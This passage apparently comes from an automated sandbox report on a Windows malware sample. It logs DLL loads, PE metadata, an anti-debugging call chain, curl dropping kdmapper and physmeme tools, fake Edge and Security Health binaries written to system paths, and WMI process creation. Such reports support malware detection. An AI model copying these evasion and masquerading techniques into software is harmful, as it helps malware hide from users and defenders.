                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                Source: C:\Edge\msedge.exeSection loaded: mscoree.dll
                                Source: C:\Edge\msedge.exeSection loaded: kernel.appcore.dll
                                Source: C:\Edge\msedge.exeSection loaded: version.dll
                                Source: C:\Edge\msedge.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: uxtheme.dll
                                Source: C:\Edge\msedge.exeSection loaded: windows.storage.dll
                                Source: C:\Edge\msedge.exeSection loaded: wldp.dll
                                Source: C:\Edge\msedge.exeSection loaded: profapi.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptsp.dll
                                Source: C:\Edge\msedge.exeSection loaded: rsaenh.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptbase.dll
                                Source: C:\Edge\msedge.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                Source: C:\Edge\msedge.exeSection loaded: mscoree.dll
                                Source: C:\Edge\msedge.exeSection loaded: kernel.appcore.dll
                                Source: C:\Edge\msedge.exeSection loaded: version.dll
                                Source: C:\Edge\msedge.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: uxtheme.dll
                                Source: C:\Edge\msedge.exeSection loaded: windows.storage.dll
                                Source: C:\Edge\msedge.exeSection loaded: wldp.dll
                                Source: C:\Edge\msedge.exeSection loaded: profapi.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptsp.dll
                                Source: C:\Edge\msedge.exeSection loaded: rsaenh.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptbase.dll
                                Source: C:\Edge\msedge.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                                Source: C:\Edge\msedge.exeSection loaded: mscoree.dll
                                Source: C:\Edge\msedge.exeSection loaded: kernel.appcore.dll
                                Source: C:\Edge\msedge.exeSection loaded: version.dll
                                Source: C:\Edge\msedge.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: uxtheme.dll
                                Source: C:\Edge\msedge.exeSection loaded: windows.storage.dll
                                Source: C:\Edge\msedge.exeSection loaded: wldp.dll
                                Source: C:\Edge\msedge.exeSection loaded: profapi.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptsp.dll
                                Source: C:\Edge\msedge.exeSection loaded: rsaenh.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptbase.dll
                                Source: C:\Edge\msedge.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: ktmw32.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: rasapi32.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: rasman.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: rtutils.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: winhttp.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeSection loaded: dnsapi.dll
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                Source: 4tXm5yPtiy.exeStatic PE information: Image base 0x140000000 > 0x60000000
                                Source: 4tXm5yPtiy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: 4tXm5yPtiy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: 4tXm5yPtiy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: 4tXm5yPtiy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: 4tXm5yPtiy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: 4tXm5yPtiy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: 4tXm5yPtiy.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: 4tXm5yPtiy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kdmapper.exe, 00000005.00000003.1492361002.00000000065B3000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000005.00000003.1491863067.00000000065B1000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000005.00000000.1489764684.0000000000183000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe, 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe.4.dr
                                Source: Binary string: System.Windows.Forms.pdb source: wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2401770635.000000001B03D000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\sigmaclown\Desktop\Ghosty\build\usermode\usermode.pdb66 source: 4tXm5yPtiy.exe
                                Source: Binary string: em.pdb" source: wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2401770635.000000001B03D000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: msedge.exe, 00000030.00000002.2113348313.000000001BEEA000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.pdb source: msedge.exe, 0000000F.00000002.1695882943.00000000036C0000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\sigmaclown\Desktop\Ghosty\build\usermode\usermode.pdb source: 4tXm5yPtiy.exe
                                Source: Binary string: c:\rje\tg\k5ye\obj\Release\Fcs.pdb source: curl.exe, 00000007.00000003.1502683045.000001FB23FD4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1503257349.000001FB23F90000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1502895817.000001FB23FED000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1502820544.000001FB23FED000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1502683045.000001FB23FED000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1502820544.000001FB23FD4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: System.pdb source: msedge.exe, 00000030.00000002.2113348313.000000001BEEA000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.pdb source: msedge.exe, 0000000F.00000002.1695882943.00000000036C0000.00000004.00000800.00020000.00000000.sdmp
                                Source: 4tXm5yPtiy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: 4tXm5yPtiy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: 4tXm5yPtiy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: 4tXm5yPtiy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: 4tXm5yPtiy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.cmdline"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.cmdline"Jump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4B4BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF68B4B4BD0
                                Source: C:\Windows\Speech\kdmapper.exeFile created: C:\Edge\__tmp_rar_sfx_access_check_7138734Jump to behavior
                                Source: kdmapper.exe.4.drStatic PE information: section name: .didat
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0016F640 push ecx; ret 5_2_0016F653
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0016EB78 push eax; ret 5_2_0016EB96
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00440905 push ecx; retf 11_2_00440906
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00452DD9 push eax; retf 11_2_004534E2
                                Source: C:\Edge\msedge.exeCode function: 15_2_00007FFB4B104B92 pushad ; retf 15_2_00007FFB4B104B95
                                Source: C:\Edge\msedge.exeCode function: 15_2_00007FFB4B4F8B28 push eax; ret 15_2_00007FFB4B4F8B29
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 21_2_00007FFB4B0F4B92 pushad ; retf 21_2_00007FFB4B0F4B95
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 21_2_00007FFB4B4E8B28 push eax; ret 21_2_00007FFB4B4E8B29
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 22_2_00007FFB4B0E4B92 pushad ; retf 22_2_00007FFB4B0E4B95
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFB4AFED2A5 pushad ; iretd 30_2_00007FFB4AFED2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFB4B102045 push eax; iretd 30_2_00007FFB4B10233D
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFB4B102074 push eax; iretd 30_2_00007FFB4B10233D
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFB4B1085D3 push ebx; ret 30_2_00007FFB4B10862A
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFB4B1085FA push ebx; ret 30_2_00007FFB4B10862A
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFB4B1D2316 push 8B485F91h; iretd 30_2_00007FFB4B1D231B
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFB4AFCD2A5 pushad ; iretd 31_2_00007FFB4AFCD2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFB4B1B2316 push 8B485F93h; iretd 31_2_00007FFB4B1B231B
                                Source: C:\Edge\msedge.exeCode function: 37_2_00007FFB4B0E8AC3 push ss; iretd 37_2_00007FFB4B0E8AC9
                                Source: C:\Edge\msedge.exeCode function: 37_2_00007FFB4B0E967D push edi; ret 37_2_00007FFB4B0E9688
                                Source: C:\Edge\msedge.exeCode function: 37_2_00007FFB4B107A05 push eax; iretd 37_2_00007FFB4B107A4D
                                Source: C:\Edge\msedge.exeCode function: 37_2_00007FFB4B0D4B92 pushad ; retf 37_2_00007FFB4B0D4B95
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4B118AC3 push ss; iretd 39_2_00007FFB4B118AC9
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4B11967D push edi; ret 39_2_00007FFB4B119688
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4B104B92 pushad ; retf 39_2_00007FFB4B104B95
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4B137A05 push eax; iretd 39_2_00007FFB4B137A4D
                                Source: C:\Edge\msedge.exeCode function: 41_2_00007FFB4B0C4B92 pushad ; retf 41_2_00007FFB4B0C4B95
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 42_2_00007FFB4B104B92 pushad ; retf 42_2_00007FFB4B104B95
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 42_2_00007FFB4B118AC3 push ss; iretd 42_2_00007FFB4B118AC9
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 42_2_00007FFB4B11967D push edi; ret 42_2_00007FFB4B119688
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 42_2_00007FFB4B137A05 push eax; iretd 42_2_00007FFB4B137A4D
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 47_2_00007FFB4B104B92 pushad ; retf 47_2_00007FFB4B104B95
                                Source: msedge.exe.5.drStatic PE information: section name: .text entropy: 7.556050087022216
                                Source: physmeme.exe.7.drStatic PE information: section name: .text entropy: 7.9965850430662675
                                Source: wCnmgKwwXYQbWeNvWeCCOp.exe.15.drStatic PE information: section name: .text entropy: 7.556050087022216

                                Persistence and Installation Behavior

                                barindex
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeExecutable created and started: C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeExecutable created and started: C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\UXzpIjDH.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\WpXNITDI.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile created: C:\Users\user\Desktop\VPYFfuwr.logJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile created: C:\Users\user\Desktop\JlazcluE.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile created: C:\Users\user\Desktop\NKJXVMBv.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\uIZJMPyD.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile created: C:\Users\user\Desktop\VltWWbmg.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile created: C:\Users\user\Desktop\fZXNGngO.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\NhvHKDkY.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\EVLpKOHn.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\DqsZwsEl.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\GfhqKgmo.logJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\physmeme.exeJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\eGTFsMJp.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile created: C:\Users\user\Desktop\rWRTdVVu.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile created: C:\Users\user\Desktop\wDtsBZWh.logJump to dropped file
                                Source: C:\Windows\Speech\kdmapper.exeFile created: C:\Edge\msedge.exeJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\XmyVeTRC.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile created: C:\Users\user\Desktop\TUtPMNAm.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile created: C:\Users\user\Desktop\zrKsasrd.logJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\kdmapper.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile created: C:\Users\user\Desktop\MQUzRRxE.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\iacMOeMk.logJump to dropped file
